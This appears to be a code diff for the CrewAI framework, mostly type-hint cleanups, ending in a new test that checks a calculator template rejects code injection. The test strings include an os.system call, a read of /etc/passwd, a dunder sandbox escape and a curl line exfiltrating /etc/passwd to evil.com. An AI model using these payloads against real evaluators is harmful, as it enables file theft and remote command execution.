||||
"""Get the read stream."""
|
||||
if self._read_stream is None:
|
||||
raise RuntimeError("Transport not connected. Call connect() first.")
|
||||
return self._read_stream
|
||||
|
||||
@property
|
||||
def write_stream(self) -> WriteStream:
|
||||
def write_stream(self) -> MCPWriteStream:
|
||||
"""Get the write stream."""
|
||||
if self._write_stream is None:
|
||||
raise RuntimeError("Transport not connected. Call connect() first.")
|
||||
@@ -107,7 +97,7 @@ class BaseTransport(ABC):
|
||||
"""Async context manager exit."""
|
||||
...
|
||||
|
||||
def _set_streams(self, read: ReadStream, write: WriteStream) -> None:
|
||||
def _set_streams(self, read: MCPReadStream, write: MCPWriteStream) -> None:
|
||||
"""Set the read and write streams.
|
||||
|
||||
Args:
|
||||
|
||||
@@ -1,17 +1,16 @@
|
||||
"""HTTP and Streamable HTTP transport for MCP servers."""
|
||||
|
||||
import asyncio
|
||||
import sys
|
||||
from typing import Any
|
||||
|
||||
from typing_extensions import Self
|
||||
|
||||
|
||||
# BaseExceptionGroup is available in Python 3.11+
|
||||
try:
|
||||
if sys.version_info >= (3, 11):
|
||||
from builtins import BaseExceptionGroup
|
||||
except ImportError:
|
||||
# Fallback for Python < 3.11 (shouldn't happen in practice)
|
||||
BaseExceptionGroup = Exception
|
||||
else:
|
||||
from exceptiongroup import BaseExceptionGroup
|
||||
|
||||
from crewai.mcp.transports.base import BaseTransport, TransportType
|
||||
|
||||
|
||||
@@ -122,11 +122,14 @@ class StdioTransport(BaseTransport):
|
||||
if self._process is not None:
|
||||
try:
|
||||
self._process.terminate()
|
||||
loop = asyncio.get_running_loop()
|
||||
try:
|
||||
await asyncio.wait_for(self._process.wait(), timeout=5.0)
|
||||
await asyncio.wait_for(
|
||||
loop.run_in_executor(None, self._process.wait), timeout=5.0
|
||||
)
|
||||
except asyncio.TimeoutError:
|
||||
self._process.kill()
|
||||
await self._process.wait()
|
||||
await loop.run_in_executor(None, self._process.wait)
|
||||
# except ProcessLookupError:
|
||||
# pass
|
||||
finally:
|
||||
|
||||
@@ -52,7 +52,7 @@ class ChromaDBClient(BaseClient):
|
||||
def __init__(
|
||||
self,
|
||||
client: ChromaDBClientType,
|
||||
embedding_function: ChromaEmbeddingFunction,
|
||||
embedding_function: ChromaEmbeddingFunction, # type: ignore[type-arg]
|
||||
default_limit: int = 5,
|
||||
default_score_threshold: float = 0.6,
|
||||
default_batch_size: int = 100,
|
||||
|
||||
@@ -23,7 +23,7 @@ from crewai.rag.core.base_client import BaseCollectionParams, BaseCollectionSear
|
||||
ChromaDBClientType = ClientAPI | AsyncClientAPI
|
||||
|
||||
|
||||
class ChromaEmbeddingFunctionWrapper(ChromaEmbeddingFunction):
|
||||
class ChromaEmbeddingFunctionWrapper(ChromaEmbeddingFunction): # type: ignore[type-arg]
|
||||
"""Base class for ChromaDB EmbeddingFunction to work with Pydantic validation."""
|
||||
|
||||
@classmethod
|
||||
@@ -85,7 +85,7 @@ class ChromaDBCollectionCreateParams(BaseCollectionParams, total=False):
|
||||
|
||||
configuration: CollectionConfigurationInterface
|
||||
metadata: CollectionMetadata
|
||||
embedding_function: ChromaEmbeddingFunction
|
||||
embedding_function: ChromaEmbeddingFunction # type: ignore[type-arg]
|
||||
data_loader: DataLoader[Loadable]
|
||||
get_or_create: bool
|
||||
|
||||
|
||||
@@ -8,7 +8,7 @@ from pydantic_settings import BaseSettings, SettingsConfigDict
|
||||
from crewai.rag.core.base_embeddings_callable import EmbeddingFunction
|
||||
|
||||
|
||||
T = TypeVar("T", bound=EmbeddingFunction)
|
||||
T = TypeVar("T", bound=EmbeddingFunction) # type: ignore[type-arg]
|
||||
|
||||
|
||||
class BaseEmbeddingsProvider(BaseSettings, Generic[T]):
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
"""Core type definitions for RAG systems."""
|
||||
|
||||
from collections.abc import Sequence
|
||||
from typing import TypeVar
|
||||
from typing import Any, TypeVar
|
||||
|
||||
import numpy as np
|
||||
from numpy import floating, integer, number
|
||||
@@ -16,7 +16,7 @@ Embedding = NDArray[np.int32 | np.float32]
|
||||
Embeddings = list[Embedding]
|
||||
|
||||
Documents = list[str]
|
||||
Images = list[np.ndarray]
|
||||
Images = list[np.ndarray[Any, np.dtype[np.generic]]]
|
||||
Embeddable = Documents | Images
|
||||
|
||||
ScalarType = TypeVar("ScalarType", bound=np.generic)
|
||||
|
||||
@@ -9,7 +9,7 @@ from typing_extensions import Required, TypedDict
|
||||
class CustomProviderConfig(TypedDict, total=False):
|
||||
"""Configuration for Custom provider."""
|
||||
|
||||
embedding_callable: type[EmbeddingFunction]
|
||||
embedding_callable: type[EmbeddingFunction] # type: ignore[type-arg]
|
||||
|
||||
|
||||
class CustomProviderSpec(TypedDict, total=False):
|
||||
|
||||
@@ -85,7 +85,7 @@ class GoogleGenAIVertexEmbeddingFunction(EmbeddingFunction[Documents]):
|
||||
- output_dimensionality: Optional output embedding dimension (new SDK only)
|
||||
"""
|
||||
# Handle deprecated 'region' parameter (only if it has a value)
|
||||
region_value = kwargs.pop("region", None) # type: ignore[typeddict-item]
|
||||
region_value = kwargs.pop("region", None) # type: ignore[typeddict-item,unused-ignore]
|
||||
if region_value is not None:
|
||||
warnings.warn(
|
||||
"The 'region' parameter is deprecated, use 'location' instead. "
|
||||
@@ -94,7 +94,7 @@ class GoogleGenAIVertexEmbeddingFunction(EmbeddingFunction[Documents]):
|
||||
stacklevel=2,
|
||||
)
|
||||
if "location" not in kwargs or kwargs.get("location") is None:
|
||||
kwargs["location"] = region_value # type: ignore[typeddict-unknown-key]
|
||||
kwargs["location"] = region_value # type: ignore[typeddict-unknown-key,unused-ignore]
|
||||
|
||||
self._config = kwargs
|
||||
self._model_name = str(kwargs.get("model_name", "textembedding-gecko"))
|
||||
@@ -123,8 +123,10 @@ class GoogleGenAIVertexEmbeddingFunction(EmbeddingFunction[Documents]):
|
||||
)
|
||||
|
||||
try:
|
||||
import vertexai
|
||||
from vertexai.language_models import TextEmbeddingModel
|
||||
import vertexai # type: ignore[import-not-found]
|
||||
from vertexai.language_models import ( # type: ignore[import-not-found]
|
||||
TextEmbeddingModel,
|
||||
)
|
||||
except ImportError as e:
|
||||
raise ImportError(
|
||||
"vertexai is required for legacy embedding models (textembedding-gecko*). "
|
||||
|
||||
@@ -18,7 +18,7 @@ class VoyageAIEmbeddingFunction(EmbeddingFunction[Documents]):
|
||||
**kwargs: Configuration parameters for VoyageAI.
|
||||
"""
|
||||
try:
|
||||
import voyageai # type: ignore[import-not-found]
|
||||
import voyageai
|
||||
|
||||
except ImportError as e:
|
||||
raise ImportError(
|
||||
@@ -26,7 +26,7 @@ class VoyageAIEmbeddingFunction(EmbeddingFunction[Documents]):
|
||||
"Install it with: uv add voyageai"
|
||||
) from e
|
||||
self._config = kwargs
|
||||
self._client = voyageai.Client(
|
||||
self._client = voyageai.Client( # type: ignore[attr-defined]
|
||||
api_key=kwargs["api_key"],
|
||||
max_retries=kwargs.get("max_retries", 0),
|
||||
timeout=kwargs.get("timeout"),
|
||||
|
||||
@@ -311,8 +311,7 @@ class QdrantClient(BaseClient):
|
||||
points = []
|
||||
for doc in batch_docs:
|
||||
if _is_async_embedding_function(self.embedding_function):
|
||||
async_fn = cast(AsyncEmbeddingFunction, self.embedding_function)
|
||||
embedding = await async_fn(doc["content"])
|
||||
embedding = await self.embedding_function(doc["content"])
|
||||
else:
|
||||
sync_fn = cast(EmbeddingFunction, self.embedding_function)
|
||||
embedding = sync_fn(doc["content"])
|
||||
@@ -412,8 +411,7 @@ class QdrantClient(BaseClient):
|
||||
raise ValueError(f"Collection '{collection_name}' does not exist")
|
||||
|
||||
if _is_async_embedding_function(self.embedding_function):
|
||||
async_fn = cast(AsyncEmbeddingFunction, self.embedding_function)
|
||||
query_embedding = await async_fn(query)
|
||||
query_embedding = await self.embedding_function(query)
|
||||
else:
|
||||
sync_fn = cast(EmbeddingFunction, self.embedding_function)
|
||||
query_embedding = sync_fn(query)
|
||||
|
||||
@@ -7,10 +7,10 @@ import numpy as np
|
||||
from pydantic import GetCoreSchemaHandler
|
||||
from pydantic_core import CoreSchema, core_schema
|
||||
from qdrant_client import (
|
||||
AsyncQdrantClient, # type: ignore[import-not-found]
|
||||
QdrantClient as SyncQdrantClient, # type: ignore[import-not-found]
|
||||
AsyncQdrantClient,
|
||||
QdrantClient as SyncQdrantClient,
|
||||
)
|
||||
from qdrant_client.models import ( # type: ignore[import-not-found]
|
||||
from qdrant_client.models import (
|
||||
FieldCondition,
|
||||
Filter,
|
||||
HasIdCondition,
|
||||
|
||||
@@ -5,10 +5,10 @@ from typing import TypeGuard
|
||||
from uuid import uuid4
|
||||
|
||||
from qdrant_client import (
|
||||
AsyncQdrantClient, # type: ignore[import-not-found]
|
||||
QdrantClient as SyncQdrantClient, # type: ignore[import-not-found]
|
||||
AsyncQdrantClient,
|
||||
QdrantClient as SyncQdrantClient,
|
||||
)
|
||||
from qdrant_client.models import ( # type: ignore[import-not-found]
|
||||
from qdrant_client.models import (
|
||||
FieldCondition,
|
||||
Filter,
|
||||
MatchValue,
|
||||
|
||||
@@ -16,7 +16,7 @@ class BaseRAGStorage(ABC):
|
||||
self,
|
||||
type: str,
|
||||
allow_reset: bool = True,
|
||||
embedder_config: ProviderSpec | BaseEmbeddingsProvider | None = None,
|
||||
embedder_config: ProviderSpec | BaseEmbeddingsProvider[Any] | None = None,
|
||||
crew: Any = None,
|
||||
):
|
||||
self.type = type
|
||||
|
||||
@@ -580,7 +580,7 @@ class Task(BaseModel):
|
||||
tools = tools or self.tools or []
|
||||
|
||||
self.processed_by_agents.add(agent.role)
|
||||
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self)) # type: ignore[no-untyped-call]
|
||||
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self))
|
||||
result = await agent.aexecute_task(
|
||||
task=self,
|
||||
context=context,
|
||||
@@ -662,12 +662,12 @@ class Task(BaseModel):
|
||||
self._save_file(content)
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
TaskCompletedEvent(output=task_output, task=self), # type: ignore[no-untyped-call]
|
||||
TaskCompletedEvent(output=task_output, task=self),
|
||||
)
|
||||
return task_output
|
||||
except Exception as e:
|
||||
self.end_time = datetime.datetime.now()
|
||||
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self)) # type: ignore[no-untyped-call]
|
||||
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self))
|
||||
raise e # Re-raise the exception after emitting the event
|
||||
finally:
|
||||
clear_task_files(self.id)
|
||||
@@ -694,7 +694,7 @@ class Task(BaseModel):
|
||||
tools = tools or self.tools or []
|
||||
|
||||
self.processed_by_agents.add(agent.role)
|
||||
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self)) # type: ignore[no-untyped-call]
|
||||
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self))
|
||||
result = agent.execute_task(
|
||||
task=self,
|
||||
context=context,
|
||||
@@ -777,12 +777,12 @@ class Task(BaseModel):
|
||||
self._save_file(content)
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
TaskCompletedEvent(output=task_output, task=self), # type: ignore[no-untyped-call]
|
||||
TaskCompletedEvent(output=task_output, task=self),
|
||||
)
|
||||
return task_output
|
||||
except Exception as e:
|
||||
self.end_time = datetime.datetime.now()
|
||||
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self)) # type: ignore[no-untyped-call]
|
||||
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self))
|
||||
raise e # Re-raise the exception after emitting the event
|
||||
finally:
|
||||
clear_task_files(self.id)
|
||||
|
||||
@@ -32,8 +32,8 @@ class ConditionalTask(Task):
|
||||
def __init__(
|
||||
self,
|
||||
condition: Callable[[Any], bool] | None = None,
|
||||
**kwargs,
|
||||
):
|
||||
**kwargs: Any,
|
||||
) -> None:
|
||||
super().__init__(**kwargs)
|
||||
self.condition = condition
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
"""Task output representation and formatting."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from typing import Any
|
||||
|
||||
@@ -44,7 +46,7 @@ class TaskOutput(BaseModel):
|
||||
messages: list[LLMMessage] = Field(description="Messages of the task", default=[])
|
||||
|
||||
@model_validator(mode="after")
|
||||
def set_summary(self):
|
||||
def set_summary(self) -> TaskOutput:
|
||||
"""Set the summary field based on the description.
|
||||
|
||||
Returns:
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
from typing import Any
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from crewai.tools.base_tool import BaseTool
|
||||
@@ -27,8 +29,8 @@ class AddImageTool(BaseTool):
|
||||
self,
|
||||
image_url: str,
|
||||
action: str | None = None,
|
||||
**kwargs,
|
||||
) -> dict:
|
||||
**kwargs: Any,
|
||||
) -> dict[str, Any]:
|
||||
action = action or i18n.tools("add_image")["default_action"] # type: ignore
|
||||
content = [
|
||||
{"type": "text", "text": action},
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
from typing import Any
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from crewai.tools.agent_tools.base_agent_tools import BaseAgentTool
|
||||
@@ -20,7 +22,7 @@ class AskQuestionTool(BaseAgentTool):
|
||||
question: str,
|
||||
context: str,
|
||||
coworker: str | None = None,
|
||||
**kwargs,
|
||||
**kwargs: Any,
|
||||
) -> str:
|
||||
coworker = self._get_coworker(coworker, **kwargs)
|
||||
return self._execute(coworker, question, context)
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
from typing import Any
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from crewai.tools.agent_tools.base_agent_tools import BaseAgentTool
|
||||
@@ -22,7 +24,7 @@ class DelegateWorkTool(BaseAgentTool):
|
||||
task: str,
|
||||
context: str,
|
||||
coworker: str | None = None,
|
||||
**kwargs,
|
||||
**kwargs: Any,
|
||||
) -> str:
|
||||
coworker = self._get_coworker(coworker, **kwargs)
|
||||
return self._execute(coworker, task, context)
|
||||
|
||||
@@ -70,7 +70,7 @@ class MCPNativeTool(BaseTool):
|
||||
"""Get the server name."""
|
||||
return self._server_name
|
||||
|
||||
def _run(self, **kwargs) -> str:
|
||||
def _run(self, **kwargs: Any) -> str:
|
||||
"""Execute tool using the MCP client session.
|
||||
|
||||
Args:
|
||||
@@ -98,7 +98,7 @@ class MCPNativeTool(BaseTool):
|
||||
f"Error executing MCP tool {self.original_tool_name}: {e!s}"
|
||||
) from e
|
||||
|
||||
async def _run_async(self, **kwargs) -> str:
|
||||
async def _run_async(self, **kwargs: Any) -> str:
|
||||
"""Async implementation of tool execution.
|
||||
|
||||
A fresh ``MCPClient`` is created for every invocation so that
|
||||
|
||||
@@ -1,6 +1,8 @@
|
||||
"""MCP Tool Wrapper for on-demand MCP server connections."""
|
||||
|
||||
import asyncio
|
||||
from collections.abc import Callable, Coroutine
|
||||
from typing import Any
|
||||
|
||||
from crewai.tools import BaseTool
|
||||
|
||||
@@ -16,9 +18,9 @@ class MCPToolWrapper(BaseTool):
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
mcp_server_params: dict,
|
||||
mcp_server_params: dict[str, Any],
|
||||
tool_name: str,
|
||||
tool_schema: dict,
|
||||
tool_schema: dict[str, Any],
|
||||
server_name: str,
|
||||
):
|
||||
"""Initialize the MCP tool wrapper.
|
||||
@@ -54,7 +56,7 @@ class MCPToolWrapper(BaseTool):
|
||||
self._server_name = server_name
|
||||
|
||||
@property
|
||||
def mcp_server_params(self) -> dict:
|
||||
def mcp_server_params(self) -> dict[str, Any]:
|
||||
"""Get the MCP server parameters."""
|
||||
return self._mcp_server_params
|
||||
|
||||
@@ -68,7 +70,7 @@ class MCPToolWrapper(BaseTool):
|
||||
"""Get the server name."""
|
||||
return self._server_name
|
||||
|
||||
def _run(self, **kwargs) -> str:
|
||||
def _run(self, **kwargs: Any) -> str:
|
||||
"""Connect to MCP server and execute tool.
|
||||
|
||||
Args:
|
||||
@@ -84,13 +86,15 @@ class MCPToolWrapper(BaseTool):
|
||||
except Exception as e:
|
||||
return f"Error executing MCP tool {self.original_tool_name}: {e!s}"
|
||||
|
||||
async def _run_async(self, **kwargs) -> str:
|
||||
async def _run_async(self, **kwargs: Any) -> str:
|
||||
"""Async implementation of MCP tool execution with timeouts and retry logic."""
|
||||
return await self._retry_with_exponential_backoff(
|
||||
self._execute_tool_with_timeout, **kwargs
|
||||
)
|
||||
|
||||
async def _retry_with_exponential_backoff(self, operation_func, **kwargs) -> str:
|
||||
async def _retry_with_exponential_backoff(
|
||||
self, operation_func: Callable[..., Coroutine[Any, Any, str]], **kwargs: Any
|
||||
) -> str:
|
||||
"""Retry operation with exponential backoff, avoiding try-except in loop for performance."""
|
||||
last_error = None
|
||||
|
||||
@@ -119,7 +123,7 @@ class MCPToolWrapper(BaseTool):
|
||||
)
|
||||
|
||||
async def _execute_single_attempt(
|
||||
self, operation_func, **kwargs
|
||||
self, operation_func: Callable[..., Coroutine[Any, Any, str]], **kwargs: Any
|
||||
) -> tuple[str | None, str, bool]:
|
||||
"""Execute single operation attempt and return (result, error_message, should_retry)."""
|
||||
try:
|
||||
@@ -158,22 +162,23 @@ class MCPToolWrapper(BaseTool):
|
||||
return None, f"Server response parsing error: {e!s}", True
|
||||
return None, f"MCP execution error: {e!s}", False
|
||||
|
||||
async def _execute_tool_with_timeout(self, **kwargs) -> str:
|
||||
async def _execute_tool_with_timeout(self, **kwargs: Any) -> str:
|
||||
"""Execute tool with timeout wrapper."""
|
||||
return await asyncio.wait_for(
|
||||
self._execute_tool(**kwargs), timeout=MCP_TOOL_EXECUTION_TIMEOUT
|
||||
)
|
||||
|
||||
async def _execute_tool(self, **kwargs) -> str:
|
||||
async def _execute_tool(self, **kwargs: Any) -> str:
|
||||
"""Execute the actual MCP tool call."""
|
||||
from mcp import ClientSession
|
||||
from mcp.client.streamable_http import streamablehttp_client
|
||||
from mcp.types import TextContent
|
||||
|
||||
server_url = self.mcp_server_params["url"]
|
||||
|
||||
try:
|
||||
# Wrap entire operation with single timeout
|
||||
async def _do_mcp_call():
|
||||
|
||||
async def _do_mcp_call() -> str:
|
||||
async with streamablehttp_client(
|
||||
server_url, terminate_on_close=True
|
||||
) as (read, write, _):
|
||||
@@ -183,17 +188,11 @@ class MCPToolWrapper(BaseTool):
|
||||
self.original_tool_name, kwargs
|
||||
)
|
||||
|
||||
# Extract the result content
|
||||
if hasattr(result, "content") and result.content:
|
||||
if (
|
||||
isinstance(result.content, list)
|
||||
and len(result.content) > 0
|
||||
):
|
||||
content_item = result.content[0]
|
||||
if hasattr(content_item, "text"):
|
||||
return str(content_item.text)
|
||||
return str(content_item)
|
||||
return str(result.content)
|
||||
if result.content:
|
||||
content_item = result.content[0]
|
||||
if isinstance(content_item, TextContent):
|
||||
return content_item.text
|
||||
return str(content_item)
|
||||
return str(result)
|
||||
|
||||
return await asyncio.wait_for(
|
||||
@@ -203,7 +202,7 @@ class MCPToolWrapper(BaseTool):
|
||||
except asyncio.CancelledError as e:
|
||||
raise asyncio.TimeoutError("MCP operation was cancelled") from e
|
||||
except Exception as e:
|
||||
if hasattr(e, "__cause__") and e.__cause__:
|
||||
if e.__cause__ is not None:
|
||||
raise asyncio.TimeoutError(
|
||||
f"MCP connection error: {e.__cause__}"
|
||||
) from e.__cause__
|
||||
|
||||
@@ -81,7 +81,7 @@ class TaskEvaluator:
|
||||
"""
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
TaskEvaluationEvent(evaluation_type="task_evaluation", task=task), # type: ignore[no-untyped-call]
|
||||
TaskEvaluationEvent(evaluation_type="task_evaluation", task=task),
|
||||
)
|
||||
evaluation_query = (
|
||||
f"Assess the quality of the task completed based on the description, expected output, and actual results.\n\n"
|
||||
@@ -129,7 +129,7 @@ class TaskEvaluator:
|
||||
"""
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
TaskEvaluationEvent(evaluation_type="training_data_evaluation"), # type: ignore[no-untyped-call]
|
||||
TaskEvaluationEvent(evaluation_type="training_data_evaluation"),
|
||||
)
|
||||
|
||||
output_training_data = training_data[agent_id]
|
||||
|
||||
@@ -12,16 +12,16 @@ from uuid import UUID
|
||||
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from aiocache import Cache
|
||||
from aiocache import Cache # type: ignore[import-untyped]
|
||||
from crewai_files import FileInput
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
_file_store: Cache | None = None
|
||||
_file_store: Cache | None = None # type: ignore[no-any-unimported]
|
||||
|
||||
try:
|
||||
from aiocache import Cache
|
||||
from aiocache.serializers import PickleSerializer
|
||||
from aiocache.serializers import PickleSerializer # type: ignore[import-untyped]
|
||||
|
||||
_file_store = Cache(Cache.MEMORY, serializer=PickleSerializer())
|
||||
except ImportError:
|
||||
|
||||
@@ -39,7 +39,7 @@ class GuardrailResult(BaseModel):
|
||||
|
||||
@field_validator("result", "error")
|
||||
@classmethod
|
||||
def validate_result_error_exclusivity(cls, v: Any, info) -> Any:
|
||||
def validate_result_error_exclusivity(cls, v: Any, info: Any) -> Any:
|
||||
"""Ensure that result and error are mutually exclusive based on success.
|
||||
|
||||
Args:
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Literal
|
||||
from typing import Any, Literal
|
||||
from uuid import uuid4
|
||||
|
||||
from pydantic import BaseModel, Field, field_validator
|
||||
@@ -259,7 +259,7 @@ class StepObservation(BaseModel):
|
||||
|
||||
@field_validator("suggested_refinements", mode="before")
|
||||
@classmethod
|
||||
def coerce_single_refinement_to_list(cls, v):
|
||||
def coerce_single_refinement_to_list(cls, v: Any) -> Any:
|
||||
"""Coerce a single dict refinement into a list to handle LLM returning a single object."""
|
||||
if isinstance(v, dict):
|
||||
return [v]
|
||||
|
||||
@@ -182,7 +182,7 @@ class AgentReasoning:
|
||||
if self.config.llm is not None:
|
||||
if isinstance(self.config.llm, LLM):
|
||||
return self.config.llm
|
||||
return create_llm(self.config.llm)
|
||||
return cast(LLM, create_llm(self.config.llm))
|
||||
return cast(LLM, self.agent.llm)
|
||||
|
||||
def handle_agent_reasoning(self) -> AgentReasoningOutput:
|
||||
|
||||
@@ -75,7 +75,7 @@ class RPMController(BaseModel):
|
||||
self._current_rpm = 0
|
||||
|
||||
def _reset_request_count(self) -> None:
|
||||
def _reset():
|
||||
def _reset() -> None:
|
||||
self._current_rpm = 0
|
||||
if not self._shutdown_flag:
|
||||
self._timer = threading.Timer(60.0, self._reset_request_count)
|
||||
|
||||
@@ -60,7 +60,9 @@ def _extract_tool_call_info(
|
||||
StreamChunkType.TOOL_CALL,
|
||||
ToolCallChunk(
|
||||
tool_id=event.tool_call.id,
|
||||
tool_name=sanitize_tool_name(event.tool_call.function.name),
|
||||
tool_name=sanitize_tool_name(event.tool_call.function.name)
|
||||
if event.tool_call.function.name
|
||||
else None,
|
||||
arguments=event.tool_call.function.arguments,
|
||||
index=event.tool_call.index,
|
||||
),
|
||||
|
||||
@@ -76,7 +76,7 @@ Please provide ONLY the {field_name} field value as described:
|
||||
|
||||
Respond with ONLY the requested information, nothing else.
|
||||
"""
|
||||
return self.llm.call(
|
||||
result: str = self.llm.call(
|
||||
[
|
||||
{
|
||||
"role": "system",
|
||||
@@ -85,6 +85,7 @@ Respond with ONLY the requested information, nothing else.
|
||||
{"role": "user", "content": prompt},
|
||||
]
|
||||
)
|
||||
return result
|
||||
|
||||
def _process_field_value(self, response: str, field_type: type | None) -> Any:
|
||||
response = response.strip()
|
||||
@@ -104,7 +105,8 @@ Respond with ONLY the requested information, nothing else.
|
||||
def _parse_list(self, response: str) -> list[Any]:
|
||||
try:
|
||||
if response.startswith("["):
|
||||
return json.loads(response)
|
||||
parsed: list[Any] = json.loads(response)
|
||||
return parsed
|
||||
|
||||
items: list[str] = [
|
||||
item.strip() for item in response.split("\n") if item.strip()
|
||||
|
||||
@@ -1571,8 +1571,9 @@ class TestReasoningEffort:
|
||||
executor.agent.planning_config = None
|
||||
assert executor._get_reasoning_effort() == "medium"
|
||||
|
||||
# Case 3: planning_config without reasoning_effort attr → defaults to "medium"
|
||||
executor.agent.planning_config = Mock(spec=[])
|
||||
# Case 3: planning_config with default reasoning_effort
|
||||
executor.agent.planning_config = Mock()
|
||||
executor.agent.planning_config.reasoning_effort = "medium"
|
||||
assert executor._get_reasoning_effort() == "medium"
|
||||
|
||||
|
||||
|
||||
184
lib/crewai/tests/cli/test_safe_calculator_template.py
Normal file
184
lib/crewai/tests/cli/test_safe_calculator_template.py
Normal file
@@ -0,0 +1,184 @@
|
||||
"""Tests for the safe calculator tool pattern in the AGENTS.md template.
|
||||
|
||||
Verifies that the calculator example uses a safe AST-based evaluator
|
||||
instead of eval(), and that it correctly handles both valid math
|
||||
expressions and rejects malicious code injection attempts.
|
||||
"""
|
||||
|
||||
import ast
|
||||
import operator
|
||||
import re
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Extract and compile the calculator function from the AGENTS.md template
|
||||
# so that the tests always stay in sync with the shipped code.
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
TEMPLATE_PATH = (
|
||||
Path(__file__).resolve().parents[2]
|
||||
/ "src"
|
||||
/ "crewai"
|
||||
/ "cli"
|
||||
/ "templates"
|
||||
/ "AGENTS.md"
|
||||
)
|
||||
|
||||
|
||||
def _extract_calculator_source() -> str:
|
||||
"""Return the Python source of the Calculator tool block in AGENTS.md."""
|
||||
content = TEMPLATE_PATH.read_text()
|
||||
|
||||
# Find the code block after "### Using @tool Decorator"
|
||||
pattern = r"### Using @tool Decorator\s*```python\s*(.*?)```"
|
||||
match = re.search(pattern, content, re.DOTALL)
|
||||
assert match, "Could not find Calculator code block in AGENTS.md"
|
||||
return match.group(1)
|
||||
|
||||
|
||||
def _build_calculator():
|
||||
"""Compile the calculator code from the template and return the function.
|
||||
|
||||
We deliberately avoid importing crewai.tools so that the test does not
|
||||
need the full crewai stack. The @tool decorator is replaced with a
|
||||
no-op so we get the plain function.
|
||||
"""
|
||||
source = _extract_calculator_source()
|
||||
|
||||
# Replace the crewai-specific import and decorator with a no-op
|
||||
source = source.replace("from crewai.tools import tool", "")
|
||||
source = source.replace('@tool("Calculator")', "")
|
||||
|
||||
namespace: dict = {}
|
||||
exec(source, namespace) # noqa: S102 – we control the source
|
||||
return namespace["calculator"]
|
||||
|
||||
|
||||
calculator = _build_calculator()
|
||||
|
||||
|
||||
# ---- Valid arithmetic expressions ----
|
||||
|
||||
|
||||
class TestSafeCalculatorValidExpressions:
|
||||
def test_addition(self):
|
||||
assert calculator("2 + 3") == "5"
|
||||
|
||||
def test_subtraction(self):
|
||||
assert calculator("10 - 4") == "6"
|
||||
|
||||
def test_multiplication(self):
|
||||
assert calculator("6 * 7") == "42"
|
||||
|
||||
def test_division(self):
|
||||
assert calculator("10 / 4") == "2.5"
|
||||
|
||||
def test_power(self):
|
||||
assert calculator("2 ** 10") == "1024"
|
||||
|
||||
def test_unary_negative(self):
|
||||
assert calculator("-5") == "-5"
|
||||
|
||||
def test_negative_in_expression(self):
|
||||
assert calculator("-3 + 7") == "4"
|
||||
|
||||
def test_parentheses(self):
|
||||
assert calculator("(2 + 3) * 4") == "20"
|
||||
|
||||
def test_nested_parentheses(self):
|
||||
assert calculator("((1 + 2) * (3 + 4))") == "21"
|
||||
|
||||
def test_float_values(self):
|
||||
assert calculator("3.14 * 2") == "6.28"
|
||||
|
||||
def test_complex_expression(self):
|
||||
assert calculator("2 ** 3 + 5 * (10 - 3)") == "43"
|
||||
|
||||
def test_integer_division(self):
|
||||
assert calculator("9 / 3") == "3.0"
|
||||
|
||||
|
||||
# ---- Malicious / unsafe expressions ----
|
||||
|
||||
|
||||
class TestSafeCalculatorRejectsMaliciousInput:
|
||||
"""The calculator MUST reject anything that is not pure arithmetic."""
|
||||
|
||||
def test_rejects_import_os(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("__import__('os').system('echo pwned')")
|
||||
|
||||
def test_rejects_eval(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("eval('1+1')")
|
||||
|
||||
def test_rejects_exec(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("exec('print(1)')")
|
||||
|
||||
def test_rejects_open_file(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("open('/etc/passwd').read()")
|
||||
|
||||
def test_rejects_dunder_access(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("().__class__.__bases__[0].__subclasses__()")
|
||||
|
||||
def test_rejects_string_literals(self):
|
||||
with pytest.raises(ValueError):
|
||||
calculator("'hello'")
|
||||
|
||||
def test_rejects_list_comprehension(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("[x for x in range(10)]")
|
||||
|
||||
def test_rejects_lambda(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("(lambda: 1)()")
|
||||
|
||||
def test_rejects_attribute_access(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("(1).__class__")
|
||||
|
||||
def test_rejects_variable_names(self):
|
||||
with pytest.raises(ValueError):
|
||||
calculator("x + 1")
|
||||
|
||||
def test_rejects_curl_exfiltration(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator(
|
||||
"__import__('os').system("
|
||||
"'curl https://evil.com/exfil?data=' + "
|
||||
"open('/etc/passwd').read())"
|
||||
)
|
||||
|
||||
def test_rejects_semicolon_statement(self):
|
